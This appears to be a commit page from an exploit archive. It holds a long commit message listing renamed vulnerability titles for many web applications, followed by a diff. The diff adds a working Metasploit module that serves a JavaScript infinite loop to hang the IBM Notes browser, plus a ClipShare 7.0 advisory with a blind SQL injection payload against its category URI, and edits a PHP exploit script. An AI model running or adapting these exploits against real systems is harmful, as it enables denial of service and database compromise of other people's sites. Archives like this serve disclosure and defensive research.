osCommerce 2.2 - 'admin/languages.php page' Parameter Cross-Site Scripting
osCommerce 2.2 - 'admin/manufacturers.php page' Parameter Cross-Site Scripting
osCommerce 2.2 - 'admin/products_expected.php page' Parameter Cross-Site Scripting
osCommerce 2.2 - 'admin/reviews.php page' Parameter Cross-Site Scripting
osCommerce 2.2 - 'admin/specials.php page' Parameter Cross-Site Scripting
osCommerce 2.2 - 'admin/stats_products_purchased.php page' Parameter Cross-Site Scripting
osCommerce 2.2 - 'admin/stats_products_viewed.php page' Parameter Cross-Site Scripting
osCommerce 2.2 - 'admin/tax_classes.php page' Parameter Cross-Site Scripting
osCommerce 2.2 - 'admin/tax_rates.php page' Parameter Cross-Site Scripting
osCommerce 2.2 - 'admin/zones.php page' Parameter Cross-Site Scripting

ISearch 2.16 - ISEARCH_PATH Parameter Remote File Inclusion
ISearch 2.16 - 'ISEARCH_PATH' Parameter Remote File Inclusion

Evandor Easy notesManager 0.0.1 - 'login.php' 'Username' Parameter SQL Injection
Evandor Easy notesManager 0.0.1 - 'login.php Username' Parameter SQL Injection

Dolibarr ERP/CMS 3.4.0 - 'exportcsv.php' 'sondage' Parameter SQL Injection
Dolibarr ERP/CMS 3.4.0 - 'exportcsv.php sondage' Parameter SQL Injection
BirdBlog 1.4 - '/admin/admincore.php' 'msg' Parameter Cross-Site Scripting
BirdBlog 1.4 - '/admin/comments.php' 'month' Parameter Cross-Site Scripting
BirdBlog 1.4 - '/admin/entries.php' 'month' Parameter Cross-Site Scripting
BirdBlog 1.4 - '/admin/logs.php' 'page' Parameter Cross-Site Scripting
BirdBlog 1.4 - '/admin/admincore.php msg' Parameter Cross-Site Scripting
BirdBlog 1.4 - '/admin/comments.php month' Parameter Cross-Site Scripting
BirdBlog 1.4 - '/admin/entries.php month' Parameter Cross-Site Scripting
BirdBlog 1.4 - '/admin/logs.php page' Parameter Cross-Site Scripting

Cilem Haber Free Edition - 'hata.asp' 'hata' Parameter Cross-Site Scripting
Cilem Haber Free Edition - 'hata.asp hata' Parameter Cross-Site Scripting

ImpressPages CMS 3.6 - 'manage()' Function Remote Code Execution
ImpressPages CMS 3.6 - 'manage()' Remote Code Execution
EditTag 1.2 - 'edittag.cgi' 'file' Parameter Arbitrary File Disclosure
EditTag 1.2 - 'edittag.pl' 'file' Parameter Arbitrary File Disclosure
EditTag 1.2 - 'edittag_mp.cgi' 'file' Parameter Arbitrary File Disclosure
EditTag 1.2 - 'edittag_mp.pl' 'file' Parameter Arbitrary File Disclosure
EditTag 1.2 - 'edittag.cgi file' Parameter Arbitrary File Disclosure
EditTag 1.2 - 'edittag.pl file' Parameter Arbitrary File Disclosure
EditTag 1.2 - 'edittag_mp.cgi file' Parameter Arbitrary File Disclosure
EditTag 1.2 - 'edittag_mp.pl file' Parameter Arbitrary File Disclosure

Project'Or RIA 3.4.0 - 'objectDetail.php' 'objectId' Parameter SQL Injection
Project'Or RIA 3.4.0 - 'objectDetail.php objectId' Parameter SQL Injection
WordPress 2.1.1 - 'wp-includes/theme.php' 'iz' Parameter Arbitrary Command Execution
Tyger Bug Tracking System 1.1.3 - 'ViewBugs.php' 's' Parameter SQL Injection
WordPress 2.1.1 - 'wp-includes/theme.php iz' Parameter Arbitrary Command Execution
Tyger Bug Tracking System 1.1.3 - 'ViewBugs.php s' Parameter SQL Injection

aBitWhizzy - 'whizzylink.php' 'd' Parameter Traversal Arbitrary Directory Listing
aBitWhizzy - 'whizzylink.php d' Parameter Traversal Arbitrary Directory Listing

PHPLive! 3.2.2 - 'super/info.php' 'BASE_URL' Parameter Parameter Cross-Site Scripting
PHPLive! 3.2.2 - 'super/info.php BASE_URL' Parameter Parameter Cross-Site Scripting
DotClear 1.2.x - '/ecrire/trackback.php' 'post_id' Parameter Cross-Site Scripting
DotClear 1.2.x - '/tools/thememng/index.php' 'tool_url' Parameter Cross-Site Scripting
DotClear 1.2.x - '/ecrire/trackback.php post_id' Parameter Cross-Site Scripting
DotClear 1.2.x - '/tools/thememng/index.php tool_url' Parameter Cross-Site Scripting

ToendaCMS 1.5.3 - HTTP Get And Post Forms HTML Injection
ToendaCMS 1.5.3 - GET / POST Forms HTML Injection

Exponent CMS 0.96.5/0.96.6 - 'iconspopup.php' 'icodir' Parameter Traversal Arbitrary Directory Listing
Exponent CMS 0.96.5/0.96.6 - 'iconspopup.php icodir' Parameter Traversal Arbitrary Directory Listing

Phorum 5.1.20 - 'admin.php' 'module[]' Parameter Full Path Disclosure
Phorum 5.1.20 - 'admin.php module[]' Parameter Full Path Disclosure
DynaTracker 1.5.1 - 'includes_handler.php' 'base_path' Remote File Inclusion
DynaTracker 1.5.1 - 'action.php' 'base_path' Remote File Inclusion
DynaTracker 1.5.1 - 'includes_handler.php base_path' Remote File Inclusion
DynaTracker 1.5.1 - 'action.php base_path' Remote File Inclusion
Campsite 2.6.1 - 'LocalizerConfig.php' 'g_documentRoot' Parameter Remote File Inclusion
Campsite 2.6.1 - 'LocalizerLanguage.php' 'g_documentRoot' Parameter Remote File Inclusion
Chamilo Lms 1.9.6 - 'profile.php' 'password0 Parameter SQL Injection
Dokeos 2.2 RC2 - 'index.php' 'language' Parameter SQL Injection
Campsite 2.6.1 - 'LocalizerConfig.php g_documentRoot' Parameter Remote File Inclusion
Campsite 2.6.1 - 'LocalizerLanguage.php g_documentRoot' Parameter Remote File Inclusion
Chamilo Lms 1.9.6 - 'profile.php password0 Parameter SQL Injection
Dokeos 2.2 RC2 - 'index.php language' Parameter SQL Injection
NetFlow Analyzer 5 - '/jspui/applicationList.jsp' 'alpha' Parameter Cross-Site Scripting
NetFlow Analyzer 5 - '/jspui/appConfig.jsp' 'task' Parameter Cross-Site Scripting
NetFlow Analyzer 5 - '/jspui/applicationList.jsp alpha' Parameter Cross-Site Scripting
NetFlow Analyzer 5 - '/jspui/appConfig.jsp task' Parameter Cross-Site Scripting
NetFlow Analyzer 5 - '/jspui/selectDevice.jsp' 'rtype' Parameter Cross-Site Scripting
NetFlow Analyzer 5 - '/jspui/customReport.jsp' 'rtype' Parameter Cross-Site Scripting
NetFlow Analyzer 5 - '/jspui/selectDevice.jsp rtype' Parameter Cross-Site Scripting
NetFlow Analyzer 5 - '/jspui/customReport.jsp rtype' Parameter Cross-Site Scripting
geoBlog MOD_1.0 - 'deletecomment.php' 'id' Parameter Arbitrary Comment Deletion
geoBlog MOD_1.0 - 'deleteblog.php' 'id' Parameter Arbitrary Blog Deletion
geoBlog MOD_1.0 - 'deletecomment.php id' Parameter Arbitrary Comment Deletion
geoBlog MOD_1.0 - 'deleteblog.php id' Parameter Arbitrary Blog Deletion
Web News 1.1 - 'feed.php' 'config[root_ordner]' Parameter Remote File Inclusion
Web News 1.1 - 'news.php' 'config[root_ordner]' Parameter Remote File Inclusion
Web News 1.1 - 'feed.php config[root_ordner]' Parameter Remote File Inclusion
Web News 1.1 - 'news.php config[root_ordner]' Parameter Remote File Inclusion

WebBatch - 'webbatch.exe' 'dumpinputdata' Parameter Remote Information Disclosure
WebBatch - 'webbatch.exe dumpinputdata' Parameter Remote Information Disclosure

AfterLogic MailBee WebMail Pro 3.x - 'default.asp' 'mode2' Parameter Cross-Site Scripting
AfterLogic MailBee WebMail Pro 3.x - 'default.asp mode2' Parameter Cross-Site Scripting

phpMyAdmin 2.11.1 - setup.php Cross-Site Scripting
phpMyAdmin 2.11.1 - 'setup.php' Cross-Site Scripting
Ossigeno CMS 2.2_pre1 - 'upload/xax/admin/modules/install_module.php' 'level' Parameter Remote File Inclusion
Ossigeno CMS 2.2_pre1 - 'upload/xax/admin/modules/uninstall_module.php' 'level' Parameter Remote File Inclusion
Ossigeno CMS 2.2_pre1 - 'upload/xax/admin/patch/index.php' 'level' Parameter Remote File Inclusion
Ossigeno CMS 2.2_pre1 - 'upload/xax/ossigeno/admin/install_module.php' 'level' Parameter Remote File Inclusion
Ossigeno CMS 2.2_pre1 - 'upload/xax/ossigeno/admin/uninstall_module.php' 'level' Parameter Remote File Inclusion
Ossigeno CMS 2.2_pre1 - 'upload/xax/admin/modules/install_module.php level' Parameter Remote File Inclusion
Ossigeno CMS 2.2_pre1 - 'upload/xax/admin/modules/uninstall_module.php level' Parameter Remote File Inclusion
Ossigeno CMS 2.2_pre1 - 'upload/xax/admin/patch/index.php level' Parameter Remote File Inclusion
Ossigeno CMS 2.2_pre1 - 'upload/xax/ossigeno/admin/install_module.php level' Parameter Remote File Inclusion
Ossigeno CMS 2.2_pre1 - 'upload/xax/ossigeno/admin/uninstall_module.php level' Parameter Remote File Inclusion

Absolute News Manager .NET 5.1 - 'pages/default.aspx' 'template' Parameter Remote File Access
Absolute News Manager .NET 5.1 - 'pages/default.aspx template' Parameter Remote File Access

MyBlog 1.x - 'Games.php' 'ID' Remote File Inclusion
MyBlog 1.x - 'Games.php ID' Remote File Inclusion
Sun Java System Identity Manager 6.0/7.0/7.1 - '/idm/account/findForSelect.jsp' 'resultsForm' Parameter Cross-Site Scripting
Sun Java System Identity Manager 6.0/7.0/7.1 - '/idm/help/index.jsp' 'helpUrl' Parameter Remote Frame Injection
Sun Java System Identity Manager 6.0/7.0/7.1 - '/idm/user/main.jsp' 'activeControl' Parameter Cross-Site Scripting
Sun Java System Identity Manager 6.0/7.0/7.1 - '/idm/account/findForSelect.jsp resultsForm' Parameter Cross-Site Scripting
Sun Java System Identity Manager 6.0/7.0/7.1 - '/idm/help/index.jsp helpUrl' Parameter Remote Frame Injection
Sun Java System Identity Manager 6.0/7.0/7.1 - '/idm/user/main.jsp activeControl' Parameter Cross-Site Scripting
WebcamXP 3.72.440/4.05.280 Beta - '/pocketpc' 'camnum' Parameter Arbitrary Memory Disclosure
WebcamXP 3.72.440/4.05.280 Beta - '/show_gallery_pic' 'id' Parameter Arbitrary Memory Disclosure
WebcamXP 3.72.440/4.05.280 Beta - '/pocketpc camnum' Parameter Arbitrary Memory Disclosure
WebcamXP 3.72.440/4.05.280 Beta - '/show_gallery_pic id' Parameter Arbitrary Memory Disclosure

CiMe - Citas Médicas - Multiple Vulnerabilities
CiMe Citas Médicas - Multiple Vulnerabilities

Elastic Path 4.1 - 'manager/FileManager.jsp' 'dir' Parameter Traversal Arbitrary Directory Listing
Elastic Path 4.1 - 'manager/FileManager.jsp dir' Parameter Traversal Arbitrary Directory Listing

osCommerce 2.3.3.4 - 'geo_zones.php' 'zID' Parameter SQL Injection
osCommerce 2.3.3.4 - 'geo_zones.php zID' Parameter SQL Injection

Concrete5 CMS 5.6.2.1 - 'index.php' 'cID' Parameter SQL Injection
Concrete5 CMS 5.6.2.1 - 'index.php cID' Parameter SQL Injection

WordPress Plugin AdRotate 3.9.4 - 'clicktracker.php' 'track' Parameter SQL Injection
WordPress Plugin AdRotate 3.9.4 - 'clicktracker.ph track' Parameter SQL Injection

PHPEasyData 1.5.4 - admin/login.php 'Username' Field SQL Injection
PHPEasyData 1.5.4 - 'admin/login.php Username' SQL Injection

PHP Ticket System Beta 1 - 'get_all_created_by_user.php' 'id' Parameter SQL Injection
PHP Ticket System Beta 1 - 'get_all_created_by_user.php id' Parameter SQL Injection

webERP 4.11.3 - 'SalesInquiry.php' 'SortBy' Parameter SQL Injection
webERP 4.11.3 - 'SalesInquiry.php SortBy' Parameter SQL Injection

Claroline 1.8.9 - 'claroline/redirector.php' 'url' Parameter Arbitrary Site Redirect
Claroline 1.8.9 - 'claroline/redirector.php url' Parameter Arbitrary Site Redirect

XOOPS 2.0.18 - 'modules/system/admin.php' 'fct' Parameter Traversal Local File Inclusion
XOOPS 2.0.18 - 'modules/system/admin.php fct' Parameter Traversal Local File Inclusion

ownCloud 4.0.x/4.5.x - 'upload.php' 'Filename' Parameter Remote Code Execution
ownCloud 4.0.x/4.5.x - 'upload.php Filename' Parameter Remote Code Execution

InterWorx Control Panel 5.0.13 build 574 - 'xhr.php' 'i' Parameter SQL Injection
InterWorx Control Panel 5.0.13 build 574 - 'xhr.php i' Parameter SQL Injection

MKPortal 1.2.1 - '/modules/rss/handler_image.php' 'i' Parameter Cross-Site Scripting
MKPortal 1.2.1 - '/modules/rss/handler_image.php i' Parameter Cross-Site Scripting

glFusion 1.1 - Anonymous Comment 'Username' Field HTML Injection
glFusion 1.1 - Anonymous Comment 'Username' HTML Injection

IceWarp Merak Mail Server 9.4.1 - 'cleanHTML()' Function Cross-Site Scripting
IceWarp Merak Mail Server 9.4.1 - 'cleanHTML()' Cross-Site Scripting

kitForm CRM Extension 0.43 - 'sorter.ph' 'sorter_value' Parameter SQL Injection
kitForm CRM Extension 0.43 - 'sorter.ph sorter_value' Parameter SQL Injection

dompdf 0.6.0 - 'dompdf.php' 'read' Parameter Arbitrary File Read
dompdf 0.6.0 - 'dompdf.php read' Parameter Arbitrary File Read

WordPress Plugin TYPO3 - 't3m_cumulus_tagcloud' Extension 1.0 - HTML Injection / Cross-Site Scripting
WordPress Plugin TYPO3 't3m_cumulus_tagcloud' Extension 1.0 - HTML Injection / Cross-Site Scripting
DiamondList - '/user/main/update_settings' 'setting[site_title]' Parameter Cross-Site Scripting
DiamondList - '/user/main/update_category' 'category[description]' Parameter Cross-Site Scripting
DiamondList - '/user/main/update_settings setting[site_title]' Parameter Cross-Site Scripting
DiamondList - '/user/main/update_category category[description]' Parameter Cross-Site Scripting

vBulletin 4.0.x < 4.1.2 - 'search.php' 'cat' Parameter SQL Injection
vBulletin 4.0.x < 4.1.2 - 'search.php cat' Parameter SQL Injection

MybbCentral TagCloud 2.0 - 'Topic' Field HTML Injection
MybbCentral TagCloud 2.0 - 'Topic' HTML Injection

Cacti 0.8.7 (RedHat High Performance Computing - HPC) - utilities.php filter Parameter Cross-Site Scripting
Cacti 0.8.7 (RedHat High Performance Computing [HPC]) - 'utilities.php' Filter Parameter Cross-Site Scripting

Mulitple WordPress Themes - 'admin-ajax.php' 'img' Parameter Arbitrary File Download
Mulitple WordPress Themes - 'admin-ajax.php img' Parameter Arbitrary File Download

Free Arcade Script 1.0 - 'search' Field Cross-Site Scripting
Free Arcade Script 1.0 - 'search' Cross-Site Scripting

Micro CMS 1.0 - 'name' Field HTML Injection
Micro CMS 1.0 - 'name' HTML Injection

MODx manager - '/controllers/default/resource/tvs.php' 'class_key' Parameter Traversal Local File Inclusion
MODx manager - '/controllers/default/resource/tvs.php class_key' Parameter Traversal Local File Inclusion

Bacula-Web 5.2.10 - 'joblogs.php' 'jobid Parameter SQL Injection
Bacula-Web 5.2.10 - 'joblogs.php jobid Parameter SQL Injection
PHP Scripts Now Riddles - '/riddles/results.php' 'searchQuery' Parameter Cross-Site Scripting
PHP Scripts Now Riddles - '/riddles/list.php' 'catid' Parameter SQL Injection
PHP Scripts Now Riddles - '/riddles/results.php searchQuery' Parameter Cross-Site Scripting
PHP Scripts Now Riddles - '/riddles/list.php catid' Parameter SQL Injection

W-Agora 4.2.1 - 'search.php3' 'bn' Parameter Traversal Local File Inclusion
W-Agora 4.2.1 - 'search.php3 bn' Parameter Traversal Local File Inclusion

Piwigo 2.6.0 - 'picture.php' 'rate' Parameter SQL Injection
Piwigo 2.6.0 - 'picture.php rate' Parameter SQL Injection

PHPMyRecipes 1.2.2 - 'dosearch.php' 'words_exact Parameter SQL Injection
PHPMyRecipes 1.2.2 - 'dosearch.php words_exact Parameter SQL Injection

PHPMyRecipes 1.2.2 - 'browse.php' 'category' Parameter SQL Injection
PHPMyRecipes 1.2.2 - 'browse.php category' Parameter SQL Injection
Dolibarr ERP/CRM - '/user/info.php' 'id' Parameter SQL Injection
Dolibarr ERP/CRM - '/admin/boxes.php' 'rowid' Parameter SQL Injection
Dolibarr ERP/CRM - '/user/info.php id' Parameter SQL Injection
Dolibarr ERP/CRM - '/admin/boxes.php rowid' Parameter SQL Injection

PrestaShop 1.4.4.1 - '/modules/mondialrelay/kit_mondialrelay/SuiviExpedition_ajax.php' 'Expedition' Parameter Cross-Site Scripting
PrestaShop 1.4.4.1 - '/modules/mondialrelay/kit_mondialrelay/SuiviExpedition_ajax.php Expedition' Parameter Cross-Site Scripting
Manx 1.0.1 - '/admin/admin_blocks.php' 'Filename' Parameter Traversal Arbitrary File Access
Manx 1.0.1 - '/admin/admin_pages.php' 'Filename' Parameter Traversal Arbitrary File Access
Manx 1.0.1 - '/admin/admin_blocks.php Filename' Parameter Traversal Arbitrary File Access
Manx 1.0.1 - '/admin/admin_pages.php Filename' Parameter Traversal Arbitrary File Access

UBBCentral UBB.Threads 7.5.6 - 'Username' Field Cross-Site Scripting
UBBCentral UBB.Threads 7.5.6 - 'Username' Cross-Site Scripting

OSClass 2.3.3 - 'index.php' 'getParam()' Function Multiple Parameter Cross-Site Scripting
OSClass 2.3.3 - 'index.php getParam()' Multiple Parameter Cross-Site Scripting
11in1 CMS 1.2.1 - 'index.php' 'class' Parameter Traversal Local File Inclusion
11in1 CMS 1.2.1 - 'admin/index.php' 'class' Parameter Traversal Local File Inclusion
11in1 CMS 1.2.1 - 'index.php class' Parameter Traversal Local File Inclusion
11in1 CMS 1.2.1 - 'admin/index.php class' Parameter Traversal Local File Inclusion
Dotclear 2.4.1.2 - '/admin/auth.php' 'login_data' Parameter Cross-Site Scripting
Dotclear 2.4.1.2 - '/admin/blogs.php' 'nb' Parameter Cross-Site Scripting
Dotclear 2.4.1.2 - '/admin/auth.php login_data' Parameter Cross-Site Scripting
Dotclear 2.4.1.2 - '/admin/blogs.php nb' Parameter Cross-Site Scripting

Dotclear 2.4.1.2 - '/admin/plugin.php' 'page' Parameter Cross-Site Scripting
Dotclear 2.4.1.2 - '/admin/plugin.php page' Parameter Cross-Site Scripting

Fork CMS 3.x - 'backend/modules/error/actions/index.php' 'parse()' Function Multiple Parameter Error Display Cross-Site Scripting
Fork CMS 3.x - 'backend/modules/error/actions/index.php parse()' Multiple Parameter Error Display Cross-Site Scripting
11in1 CMS 1.2.1 - 'admin/comments' 'topicID' Parameter SQL Injection
11in1 CMS 1.2.1 - 'admin/tps' 'id' Parameter SQL Injection
11in1 CMS 1.2.1 - 'admin/comments topicID' Parameter SQL Injection
11in1 CMS 1.2.1 - 'admin/tps id' Parameter SQL Injection
SAP Business Objects InfoView System - '/help/helpredir.aspx' 'guide' Parameter Cross-Site Scripting
SAP Business Objects InfoView System - '/webi/webi_modify.aspx' 'id' Parameter Cross-Site Scripting
SAP Business Objects InfoView System - '/help/helpredir.aspx guide' Parameter Cross-Site Scripting
SAP Business Objects InfoView System - '/webi/webi_modify.aspx id' Parameter Cross-Site Scripting

Wikidforum 2.10 - Advanced Search - Multiple Field SQL Injection
Wikidforum 2.10 - Advanced Search Multiple Field SQL Injection

Open Journal Systems (OJS) 2.3.6 - '/lib/pkp/classes/core/String.inc.php' 'String::stripUnsafeHtml()' Method Cross-Site Scripting
Open Journal Systems (OJS) 2.3.6 - '/lib/pkp/classes/core/String.inc.php String::stripUnsafeHtml()' Method Cross-Site Scripting

TeamPass 2.1.5 - 'login' Field HTML Injection
TeamPass 2.1.5 - 'login' HTML Injection

XOOPS 2.5.4 - '/modules/pm/pmlite.php' 'to_userid' Parameter Cross-Site Scripting
XOOPS 2.5.4 - '/modules/pm/pmlite.php to_userid' Parameter Cross-Site Scripting

Kajona - 'getAllPassedParams()' Function Multiple Cross-Site Scripting Vulnerabilities
Kajona - 'getAllPassedParams()' Multiple Cross-Site Scripting Vulnerabilities

PolarisCMS - 'WebForm_OnSubmit()' Function Cross-Site Scripting
PolarisCMS - 'WebForm_OnSubmit()' Cross-Site Scripting

TCExam 11.2.x - '/admin/code/tce_edit_question.php' 'subject_module_id' Parameter SQL Injection
TCExam 11.2.x - '/admin/code/tce_edit_question.php subject_module_id' Parameter SQL Injection

jCore - '/admin/index.php' 'path' Parameter Cross-Site Scripting
jCore - '/admin/index.php path' Parameter Cross-Site Scripting

Cyberoam Firewall CR500iNG-XP - 10.6.2 MR-1 - Blind SQL Injection
Cyberoam Firewall CR500iNG-XP 10.6.2 MR-1 - Blind SQL Injection

WordPress Plugin RokBox Plugin - '/wp-content/plugins/wp_rokbox/jwplayer/jwplayer.swf' 'abouttext' Parameter Cross-Site Scripting
WordPress Plugin RokBox Plugin - '/wp-content/plugins/wp_rokbox/jwplayer/jwplayer.swf abouttext' Parameter Cross-Site Scripting

cPanel WebHost Manager (WHM) - '/webmail/x3/mail/clientconf.html' 'acct' Parameter Cross-Site Scripting
cPanel WebHost Manager (WHM) - '/webmail/x3/mail/clientconf.html acct' Parameter Cross-Site Scripting
WordPress Plugin Shopping Cart for WordPress - '/wp-content/plugins/levelfourstorefront/scripts/administration/exportsubscribers.php' 'reqID' Parameter SQL Injection
WordPress Plugin Shopping Cart for WordPress - '/wp-content/plugins/levelfourstorefront/scripts/administration/backup.php' 'reqID' Parameter SQL Injection
WordPress Plugin Shopping Cart for WordPress - '/wp-content/plugins/levelfourstorefront/scripts/administration/exportaccounts.php' 'reqID' Parameter SQL Injection
WordPress Plugin Shopping Cart for WordPress - '/wp-content/plugins/levelfourstorefront/scripts/administration/exportsubscribers.php  reqID' Parameter SQL Injection
WordPress Plugin Shopping Cart for WordPress - '/wp-content/plugins/levelfourstorefront/scripts/administration/backup.php reqID' Parameter SQL Injection
WordPress Plugin Shopping Cart for WordPress - '/wp-content/plugins/levelfourstorefront/scripts/administration/exportaccounts.php reqID' Parameter SQL Injection
Kallithea 0.2.9 - (came_from) HTTP Response Splitting
PHP Address Book - '/addressbook/register/delete_user.php' 'id' Parameter SQL Injection
PHP Address Book - '/addressbook/register/edit_user.php' 'id' Parameter SQL Injection
Kallithea 0.2.9 - 'came_from' HTTP Response Splitting
PHP Address Book - '/addressbook/register/delete_user.php id' Parameter SQL Injection
PHP Address Book - '/addressbook/register/edit_user.php id' Parameter SQL Injection

PHP Address Book - '/addressbook/register/linktick.php' 'site' Parameter SQL Injection
PHP Address Book - '/addressbook/register/linktick.php site' Parameter SQL Injection
PHP Address Book - '/addressbook/register/router.php' 'BasicLogin' Cookie Parameter SQL Injection
PHP Address Book - '/addressbook/register/traffic.php' 'var' Parameter SQL Injection
PHP Address Book - '/addressbook/register/user_add_save.php' 'email' Parameter SQL Injection
PHP Address Book - '/addressbook/register/checklogin.php' 'Username' Parameter SQL Injection
PHP Address Book - '/addressbook/register/admin_index.php' 'q' Parameter SQL Injection
PHP Address Book - '/addressbook/register/router.php BasicLogin' Cookie Parameter SQL Injection
PHP Address Book - '/addressbook/register/traffic.php var' Parameter SQL Injection
PHP Address Book - '/addressbook/register/user_add_save.php email' Parameter SQL Injection
PHP Address Book - '/addressbook/register/checklogin.php Username' Parameter SQL Injection
PHP Address Book - '/addressbook/register/admin_index.php q' Parameter SQL Injection
Hero Framework - '/users/login' 'Username' Parameter Cross-Site Scripting
Hero Framework - '/users/forgot_password' 'error' Parameter Cross-Site Scripting
Hero Framework - '/users/login Username' Parameter Cross-Site Scripting
Hero Framework - '/users/forgot_password error' Parameter Cross-Site Scripting

Jahia xCM - '/engines/manager.jsp' 'site' Parameter Cross-Site Scripting
Jahia xCM - '/engines/manager.jsp site' Parameter Cross-Site Scripting

NeoBill - '/modules/nullregistrar/PHPwhois/example.php' 'query' Parameter Remote Code Execution
NeoBill - '/modules/nullregistrar/PHPwhois/example.php query' Parameter Remote Code Execution

C2C Forward Auction Creator 2.0 - '/auction/asp/list.asp' 'pa' Parameter SQL Injection
C2C Forward Auction Creator 2.0 - '/auction/asp/list.asp pa' Parameter SQL Injection
Command School Student Management System - '/sw/admin_grades.php' 'id' Parameter SQL Injection
Command School Student Management System - '/sw/admin_terms.php' 'id' Parameter SQL Injection
Command School Student Management System - '/sw/admin_school_years.php' 'id' Parameter SQL Injection
Command School Student Management System - '/sw/admin_sgrades.php' 'id' Parameter SQL Injection
Command School Student Management System - '/sw/admin_media_codes_1.php' 'id' Parameter SQL Injection
Command School Student Management System - '/sw/admin_infraction_codes.php' 'id' Parameter SQL Injection
Command School Student Management System - '/sw/admin_generations.php' 'id' Parameter SQL Injection
Command School Student Management System - '/sw/admin_relations.php' 'id' Parameter SQL Injection
Command School Student Management System - '/sw/admin_titles.php' 'id' Parameter SQL Injection
Command School Student Management System - '/sw/health_allergies.php' 'id' Parameter SQL Injection
Command School Student Management System - '/sw/admin_school_names.php' 'id' Parameter SQL Injection
Command School Student Management System - '/sw/admin_subjects.php' 'id' Parameter SQL Injection
Command School Student Management System - '/sw/admin_grades.php id' Parameter SQL Injection
Command School Student Management System - '/sw/admin_terms.php id' Parameter SQL Injection
Command School Student Management System - '/sw/admin_school_years.php id' Parameter SQL Injection
Command School Student Management System - '/sw/admin_sgrades.php id' Parameter SQL Injection
Command School Student Management System - '/sw/admin_media_codes_1.php id' Parameter SQL Injection
Command School Student Management System - '/sw/admin_infraction_codes.php id' Parameter SQL Injection
Command School Student Management System - '/sw/admin_generations.php id' Parameter SQL Injection
Command School Student Management System - '/sw/admin_relations.php id' Parameter SQL Injection
Command School Student Management System - '/sw/admin_titles.php id' Parameter SQL Injection
Command School Student Management System - '/sw/health_allergies.php id' Parameter SQL Injection
Command School Student Management System - '/sw/admin_school_names.php id' Parameter SQL Injection
Command School Student Management System - '/sw/admin_subjects.php id' Parameter SQL Injection

Dredge School Administration System - '/DSM/loader.php' 'Id' Parameter SQL Injection
Dredge School Administration System - '/DSM/loader.php Id' Parameter SQL Injection

UAEPD Shopping Script - '/news.php' 'id' Parameter SQL Injection
UAEPD Shopping Script - '/news.php id' Parameter SQL Injection
BloofoxCMS - '/bloofox/index.php' 'Username' Parameter SQL Injection
BloofoxCMS - '/bloofox/admin/index.php' 'Username' Parameter SQL Injection
BloofoxCMS - '/bloofox/index.php Username' Parameter SQL Injection
BloofoxCMS - '/bloofox/admin/index.php Username' Parameter SQL Injection

Xangati - '/servlet/Installer' 'file' Parameter Directory Traversal
Xangati - '/servlet/Installer file' Parameter Directory Traversal
Caldera - '/costview2/jobs.php' 'tr' Parameter SQL Injection
Caldera - '/costview2/printers.php' 'tr' Parameter SQL Injection
Caldera - '/costview2/jobs.php tr' Parameter SQL Injection
Caldera - '/costview2/printers.php tr' Parameter SQL Injection
OL-Commerce - '/OL-Commerce/affiliate_signup.php' 'a_country' Parameter SQL Injection
OL-Commerce - '/OL-Commerce/affiliate_show_banner.php' 'affiliate_banner_id' Parameter SQL Injection
OL-Commerce - '/OL-Commerce/create_account.php' 'country' Parameter SQL Injection
OL-Commerce - '/OL-Commerce/admin/create_account.php' 'entry_country_id' Parameter SQL Injection
OL-Commerce - '/OL-Commerce/affiliate_signup.php a_country' Parameter SQL Injection
OL-Commerce - '/OL-Commerce/affiliate_show_banner.php affiliate_banner_id' Parameter SQL Injection
OL-Commerce - '/OL-Commerce/create_account.php country' Parameter SQL Injection
OL-Commerce - '/OL-Commerce/admin/create_account.php entry_country_id' Parameter SQL Injection

Disc ORGanizer - DORG - Multiple Vulnerabilities
Disc ORGanizer (DORG) - Multiple Vulnerabilities

Apache < 2.2.34 / < 2.4.27 - HTTP OPTIONS Memory Leak
Apache < 2.2.34 / < 2.4.27 - OPTIONS Memory Leak
ClipShare 7.0 - SQL Injection
Complain Management System - Hard-Coded Credentials / Blind SQL injection
This commit is contained in:
Offensive Security 2017-10-11 05:01:35 +00:00
parent b49ee665d7
commit b77b178de0
6 changed files with 779 additions and 530 deletions

1062
files.csv

File diff suppressed because it is too large Load diff

63
platforms/multiple/dos/42969.rb Executable file
View file

@ -0,0 +1,63 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpServer
def initialize(info = {})
super(
update_info(
info,
'Name' => "IBM Notes encodeURI DOS",
'Description' => %q(
This module exploits a vulnerability in the native browser that
comes with IBM Lotus Notes.
If successful, it could cause the Notes client to hang and have
to be restarted.
),
'License' => MSF_LICENSE,
'Author' => [
'Dhiraj Mishra',
],
'References' => [
[ 'EXPLOIT-DB', '42602'],
[ 'CVE', '2017-1129' ],
[ 'URL', '
http://www-01.ibm.com/support/docview.wss?uid=swg21999385' ]
],
'DisclosureDate' => 'Aug 31 2017',
'Actions' => [[ 'WebServer' ]],
'PassiveActions' => [ 'WebServer' ],
'DefaultAction' => 'WebServer'
)
)
end
def run
exploit # start http server
end
def setup
@html = %|
<html><head><title>DOS</title>
<script type="text/javascript">
while (true) try {
var object = { };
function d(d0) {
var d0 = (object instanceof encodeURI)('foo');
}
d(75);
} catch (d) { }
</script>
</head></html>
|
end
def on_request_uri(cli, _request)
print_status('Sending response')
send_response(cli, @html)
end
end

View file

@ -174,7 +174,7 @@ $packet.="Host: ".$host."\r\n";
$packet.="Cookie: ".$cookie."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
$temp=explode("index.php?op=profile&amp;user=",$html);
$temp=explode("index.php?op=profile&user=",$html);
for ($kk=1; $kk<count($temp); $kk++)
{
$temp[$kk]=str_replace("\"","",$temp[$kk]);

41
platforms/php/webapps/42967.txt Executable file
View file

@ -0,0 +1,41 @@
# Exploit Title: ClipShare v7.0 - SQL Injection
# Date: 2017-10-09
# Exploit Author: 8bitsec
# Vendor Homepage: http://www.clip-share.com/
# Software Link: http://www.clip-share.com/
# Version: 7.0
# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6]
# Email: contact@8bitsec.io
# Contact: https://twitter.com/_8bitsec
Release Date:
=============
2017-10-09
Product & Service Introduction:
===============================
ClipShare is the first and most popular PHP video script for building highly-profitable video sharing websites.
Technical Details & Description:
================================
SQL injection on [category] URI parameter.
Proof of Concept (PoC):
=======================
SQLi:
https://localhost/[path]/videos/[category]' AND 5593=5593 AND 'LJPS'='LJPS
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
